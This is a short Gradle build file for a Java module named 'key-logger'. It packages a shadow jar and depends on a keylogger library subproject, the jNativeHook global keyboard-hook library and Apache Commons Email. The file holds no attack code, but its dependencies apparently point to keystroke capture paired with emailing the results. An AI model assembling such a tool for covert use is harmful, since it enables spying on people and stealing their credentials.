plugins {
    id "com.github.johnrengelman.shadow" version "7.1.2"
    id 'java-library'
}

dependencies {
    implementation project(':platform:base')
    implementation project(':tools:key-logger-library')
    implementation libraries.apacheCommonsEmail
    implementation libraries.jNativeHook
}

description = 'key-logger'